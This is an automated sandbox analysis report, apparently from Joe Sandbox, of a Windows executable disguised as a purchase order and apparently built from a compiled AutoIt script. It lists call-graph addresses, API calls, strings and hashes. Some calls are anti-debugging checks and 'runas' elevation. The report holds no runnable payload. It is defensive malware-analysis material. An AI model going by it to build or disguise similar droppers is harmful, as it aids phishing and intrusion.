ctype 88484->88502 88488 4115d7 52 API calls 88485->88488 88499 467b75 _memmove 88487->88499 88488->88499 88489 4115d7 52 API calls 88489->88481 88490 467b55 88491 4115d7 52 API calls 88490->88491 88492 467b5b 88491->88492 88500 442ee0 52 API calls 88492->88500 88495 4115d7 52 API calls 88494->88495 88498 467b28 ctype 88494->88498 88495->88498 88496 467b6b 88501 45f645 54 API calls ctype 88496->88501 88498->88483 88498->88490 88498->88499 88499->88489 88500->88496 88501->88499 88502->88483 88556 4533eb 88503->88556 88506 4750ee 88509 408f40 VariantClear 88506->88509 88507 475129 88560 4646e0 88507->88560 88513 4750f5 88509->88513 88510 47515e 88511 475162 88510->88511 88519 47518e 88510->88519 88513->88460 88522 4533eb 85 API calls 88519->88522 88531 475480 88519->88531 88541 475357 88519->88541 88543 4754b5 88519->88543 88592 436299 52 API calls 2 library calls 88519->88592 88593 463ad5 64 API calls __wcsicoll 88519->88593 88522->88519 88557 453404 88556->88557 88558 4533f8 88556->88558 88557->88506 88557->88507 88558->88557 88603 4531b1 85 API calls 5 library calls 88558->88603 88604 4536f7 53 API calls 88560->88604 88562 4646fc 88605 4426cd 59 API calls _wcslen 88562->88605 88564 464711 88566 40bc70 52 API calls 88564->88566 88572 46474b 88564->88572 88567 46472c 88566->88567 88606 461465 52 API calls _memmove 88567->88606 88569 464741 88570 464793 88570->88510 88572->88570 88607 463ad5 64 API calls __wcsicoll 88572->88607 88592->88519 88593->88519 88603->88557 88604->88562 88605->88564 88606->88569 88607->88570 88610 40bc70 52 API calls 88609->88610 88611 46cb7e 88610->88611 88612 40bc70 52 API calls 88611->88612 88613 46cb86 88612->88613 88614 40bc70 52 API calls 88613->88614 88615 46cb91 88614->88615 88616 408f40 VariantClear 88615->88616 88617 46cbaf 88616->88617 88618 46cbd4 CLSIDFromProgID 88617->88618 88619 46cbc5 OleInitialize 88617->88619 88619->88618 88659->87938 88660->88032 88661->87954 88662->87961 88663->87961 88664->87973 88665->87998 88666->87967 88667->87969 88668->87979 88669->88031 88670->88031 88671->87989 88672->88011 88673->87992 88674->88020 88675->88042 88676->88042 88677->88032 88678->88047 88679->88059 88680->88053 88681->88060 88682->88066 88683->88066 88684->88011 88685 42d154 88689 480a8d 88685->88689 88687 42d161 88688 480a8d 199 API calls 88687->88688 88688->88687 88690 480ae4 88689->88690 88691 480b26 88689->88691 88693 480aeb 88690->88693 88694 480b15 88690->88694 88692 40bc70 52 API calls 88691->88692 88709 480b2e 88692->88709 88696 480aee 88693->88696 88697 480b04 88693->88697 88722 4805bf 199 API calls 88694->88722 88696->88691 88699 480af3 88696->88699 88721 47fea2 199 API calls __itow_s 88697->88721 88720 47f135 199 API calls 88699->88720 88701 40e0a0 52 API calls 88701->88709 88703 408f40 VariantClear 88705 481156 88703->88705 88704 480aff 88704->88703 88706 408f40 VariantClear 88705->88706 88707 48115e 88706->88707 88707->88687 88708 401980 53 API calls 88708->88709 88709->88701 88709->88704 88709->88708 88711 40c2c0 52 API calls 88709->88711 88712 40e710 53 API calls 88709->88712 88713 40a780 199 API calls 88709->88713 88714 480ff5 88709->88714 88716 408e80 VariantClear 88709->88716 88723 45377f 52 API calls 88709->88723 88724 45e951 53 API calls 88709->88724 88725 40e830 53 API calls 88709->88725 88726 47925f 53 API calls 88709->88726 88727 47fcff 199 API calls 88709->88727 88711->88709 88712->88709 88713->88709 88728 45e737 90 API calls 3 library calls 88714->88728 88716->88709 88720->88704 88721->88704 88722->88704 88723->88709 88724->88709 88725->88709 88726->88709 88727->88709 88728->88704 88729 428905 88730 4115d7 52 API calls 88729->88730 88731 42890c 88730->88731 88732 428945 88731->88732 88733 42891f 88731->88733 88734 4115d7 52 API calls 88732->88734 88735 4115d7 52 API calls 88733->88735 88736 42894c 88734->88736 88737 428925 _memmove 88735->88737 88738 42b14b 88745 40bc10 88738->88745 88740 42b159 88741 4096a0 330 API calls 88740->88741 88742 42b177 88741->88742 88756 44b92d VariantClear 88742->88756 88744 42bc5b 88746 40bc24 88745->88746 88747 40bc17 88745->88747 88749 40bc2a 88746->88749 88750 40bc3c 88746->88750 88748 408e80 VariantClear 88747->88748 88753 40bc1f 88748->88753 88751 408e80 VariantClear 88749->88751 88752 4115d7 52 API calls 88750->88752 88754 40bc33 88751->88754 88755 40bc43 88752->88755 88753->88740 88754->88740 88755->88740 88756->88744 88757 425b2b 88762 40f000 88757->88762 88761 425b3a 88763 4115d7 52 API calls 88762->88763 88764 40f007 88763->88764 88765 4276ea 88764->88765 88771 40f030 88764->88771 88770 41130a 51 API calls __cinit 88770->88761 88772 40f039 88771->88772 88773 40f01a 88771->88773 88801 41130a 51 API calls __cinit 88772->88801 88775 40e500 88773->88775 88776 40bc70 52 API calls 88775->88776 88777 40e515 GetVersionExW 88776->88777 88778 402160 52 API calls 88777->88778 88779 40e557 88778->88779 88802 40e660 88779->88802 88783 427674 88789 4276c6 GetSystemInfo 88783->88789 88787 40e5e0 88791 4276d5 GetSystemInfo 88787->88791 88816 40efd0 88787->88816 88788 40e5cd GetCurrentProcess 88823 40ef20 LoadLibraryA GetProcAddress 88788->88823 88789->88791 88794 40e629 88820 40ef90 88794->88820 88797 40e641 FreeLibrary 88798 40e644 88797->88798 88799 40e653 FreeLibrary 88798->88799 88800 40e656 88798->88800 88799->88800 88800->88770 88801->88773 88803 40e667 88802->88803 88804 42761d 88803->88804 88805 40c600 52 API calls 88803->88805 88806 40e55c 88805->88806 88807 40e680 88806->88807 88808 40e687 88807->88808 88809 427616 88808->88809 88810 40c600 52 API calls 88808->88810 88811 40e566 88810->88811 88811->88783 88812 40ef60 88811->88812 88813 40e5c8 88812->88813 88814 40ef66 LoadLibraryA 88812->88814 88813->88787 88813->88788 88814->88813 88815 40ef77 GetProcAddress 88814->88815 88815->88813 88817 40e620 88816->88817 88818 40efd6 LoadLibraryA 88816->88818 88817->88789 88817->88794 88818->88817 88819 40efe7 GetProcAddress 88818->88819 88819->88817 88824 40efb0 LoadLibraryA GetProcAddress 88820->88824 88822 40e632 GetNativeSystemInfo 88822->88797 88822->88798 88823->88787 88824->88822 88825 425b5e 88830 40c7f0 88825->88830 88829 425b6d 88865 40db10 52 API calls 88830->88865 88832 40c82a 88866 410ab0 6 API calls 88832->88866 88834 40c86d 88835 40bc70 52 API calls 88834->88835 88836 40c877 88835->88836 88837 40bc70 52 API calls 88836->88837 88838 40c881 88837->88838 88839 40bc70 52 API calls 88838->88839 88840 40c88b 88839->88840 88841 40bc70 52 API calls 88840->88841 88842 40c8d1 88841->88842 88843 40bc70 52 API calls 88842->88843 88844 40c991 88843->88844 88867 40d2c0 52 API calls 88844->88867 88846 40c99b 88868 40d0d0 53 API calls 88846->88868 88848 40c9c1 88849 40bc70 52 API calls 88848->88849 88850 40c9cb 88849->88850 88869 40e310 53 API calls 88850->88869 88852 40ca28 88853 408f40 VariantClear 88852->88853 88854 40ca30 88853->88854 88855 408f40 VariantClear 88854->88855 88856 40ca38 GetStdHandle 88855->88856 88857 429630 88856->88857 88858 40ca87 88856->88858 88857->88858 88859 429639 88857->88859 88864 41130a 51 API calls __cinit 88858->88864 88870 4432c0 57 API calls 88859->88870 88861 429641 88871 44b6ab CreateThread 88861->88871 88863 42964f CloseHandle 88863->88858 88864->88829 88865->88832 88866->88834 88867->88846 88868->88848 88869->88852 88870->88861 88871->88863 88872 44b5cb 58 API calls 88871->88872 88873 425b6f 88878 40dc90 88873->88878 88877 425b7e 88879 40bc70 52 API calls 88878->88879 88880 40dd03 88879->88880 88887 40f210 88880->88887 88882 426a97 88884 40dd96 88884->88882 88885 40ddb7 88884->88885 88890 40dc00 52 API calls 2 library calls 88884->88890 88886 41130a 51 API calls __cinit 88885->88886 88886->88877 88891 40f250 RegOpenKeyExW 88887->88891 88889 40f230 88889->88884 88890->88884 88892 425e17 88891->88892 88893 40f275 RegQueryValueExW 88891->88893 88892->88889 88894 40f2c3 RegCloseKey 88893->88894 88895 40f298 88893->88895 88894->88889 88896 40f2a9 RegCloseKey 88895->88896 88897 425e1d 88895->88897 88896->88889

                                  Executed Functions

                                  Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcslen.LIBCMT ref: 004096C1
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _memmove.LIBCMT ref: 0040970C
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                  • _memmove.LIBCMT ref: 00409D96
                                  • _memmove.LIBCMT ref: 0040A6C4
                                  • _memmove.LIBCMT ref: 004297E5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                  • String ID:
                                  • API String ID: 2383988440-0
                                  • Opcode ID: 6ff525b2c59c7c054ff9d2bd3b1975f8866825bf581303900bce7b5d9fa65f40
                                  • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                  • Opcode Fuzzy Hash: 6ff525b2c59c7c054ff9d2bd3b1975f8866825bf581303900bce7b5d9fa65f40
                                  • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                  Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                    • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,00000104,?), ref: 00401F4C
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                    • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                  • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                  • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                    • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                  • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                  • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                  • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                    • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                    • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                    • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                    • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                    • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                    • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                    • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                  • String ID: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                  • API String ID: 2495805114-3452472325
                                  • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                  • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                  • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                  • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                  Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1515 46cb5f-46cbc3 call 40bc70 * 3 call 408f40 1524 46cbd4-46cbe7 CLSIDFromProgID 1515->1524 1525 46cbc5-46cbcd OleInitialize 1515->1525 1526 46cc33-46cc47 1524->1526 1527 46cbe9-46cbf9 CLSIDFromString 1524->1527 1525->1524 1528 46cca6-46ccba call 458651 1526->1528 1529 46cc49-46cc60 CoCreateInstance 1526->1529 1527->1526 1530 46cbfb-46cc05 1527->1530 1532 46cc96-46cca1 1528->1532 1539 46ccbc-46ccf7 CoInitializeSecurity call 412f40 call 4311fc 1528->1539 1529->1532 1533 46cc62-46cc8b call 43119b 1529->1533 1534 46cc06-46cc30 call 451b42 call 402250 * 3 1530->1534 1532->1534 1548 46cc8e-46cc90 1533->1548 1553 46cdf4 1539->1553 1554 46ccfd-46cd1f call 402160 call 431a2b 1539->1554 1548->1532 1551 46ceb7-46cef0 call 468070 call 402250 * 3 1548->1551 1555 46cdfa-46ce4a call 412f40 CoCreateInstanceEx CoTaskMemFree 1553->1555 1569 46cd35-46cd47 call 465177 1554->1569 1570 46cd21-46cd33 1554->1570 1555->1532 1565 46ce50-46ce55 1555->1565 1565->1532 1568 46ce5b-46ce62 1565->1568 1574 46ce64-46ce8b CoSetProxyBlanket 1568->1574 1575 46ce8d-46ce9e 1568->1575 1582 46cd4a-46cda3 call 40e0a0 call 402250 call 46150f call 40e0a0 call 402250 1569->1582 1571 46cda5-46cdaa 1570->1571 1579 46cdac-46cdbb call 4111c1 1571->1579 1580 46cdbd-46cdc0 1571->1580 1574->1575 1575->1548 1578 46cea4-46ceb2 1575->1578 1578->1534 1581 46cdc3-46cdf2 1579->1581 1580->1581 1581->1555 1582->1571
                                  APIs
                                  • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                  • CLSIDFromProgID.COMBASE(?,?), ref: 0046CBDF
                                  • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                  • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                  • _wcslen.LIBCMT ref: 0046CDB0
                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                  • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                  • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                    • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                    • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                    • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                  Strings
                                  • NULL Pointer assignment, xrefs: 0046CEA6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                  • String ID: NULL Pointer assignment
                                  • API String ID: 440038798-2785691316
                                  • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                  • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                  • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                  • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                  Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1986 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1995 40e582-40e583 1986->1995 1996 427674-427679 1986->1996 1999 40e585-40e596 1995->1999 2000 40e5ba-40e5cb call 40ef60 1995->2000 1997 427683-427686 1996->1997 1998 42767b-427681 1996->1998 2002 427693-427696 1997->2002 2003 427688-427691 1997->2003 2001 4276b4-4276be 1998->2001 2004 427625-427629 1999->2004 2005 40e59c-40e59f 1999->2005 2017 40e5ec-40e60c 2000->2017 2018 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2000->2018 2019 4276c6-4276ca GetSystemInfo 2001->2019 2002->2001 2009 427698-4276a8 2002->2009 2003->2001 2011 427636-427640 2004->2011 2012 42762b-427631 2004->2012 2007 40e5a5-40e5ae 2005->2007 2008 427654-427657 2005->2008 2013 40e5b4 2007->2013 2014 427645-42764f 2007->2014 2008->2000 2020 42765d-42766f 2008->2020 2015 4276b0 2009->2015 2016 4276aa-4276ae 2009->2016 2011->2000 2012->2000 2013->2000 2014->2000 2015->2001 2016->2001 2022 40e612-40e623 call 40efd0 2017->2022 2023 4276d5-4276df GetSystemInfo 2017->2023 2018->2017 2030 40e5e8 2018->2030 2019->2023 2020->2000 2022->2019 2027 40e629-40e63f call 40ef90 GetNativeSystemInfo 2022->2027 2032 40e641-40e642 FreeLibrary 2027->2032 2033 40e644-40e651 2027->2033 2030->2017 2032->2033 2034 40e653-40e654 FreeLibrary 2033->2034 2035 40e656-40e65d 2033->2035 2034->2035
                                  APIs
                                  • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                  • FreeLibrary.KERNEL32(?), ref: 0040E642
                                  • FreeLibrary.KERNEL32(?), ref: 0040E654
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                  • String ID: 0SH
                                  • API String ID: 3363477735-851180471
                                  • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                  • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                  • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                  • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                  Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: IsThemeActive$uxtheme.dll
                                  • API String ID: 2574300362-3542929980
                                  • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                  • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                  • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                  • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                  Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                  • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                  • TranslateMessage.USER32(?), ref: 00409556
                                  • DispatchMessageW.USER32(?), ref: 00409561
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Message$Peek$DispatchSleepTranslate
                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                  • API String ID: 1762048999-758534266
                                  • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                  • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                  • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                  • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                  Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,00000104,?), ref: 00401F4C
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • __wcsicoll.LIBCMT ref: 00402007
                                  • __wcsicoll.LIBCMT ref: 0040201D
                                  • __wcsicoll.LIBCMT ref: 00402033
                                    • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                  • __wcsicoll.LIBCMT ref: 00402049
                                  • _wcscpy.LIBCMT ref: 0040207C
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,00000104), ref: 00428B5B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
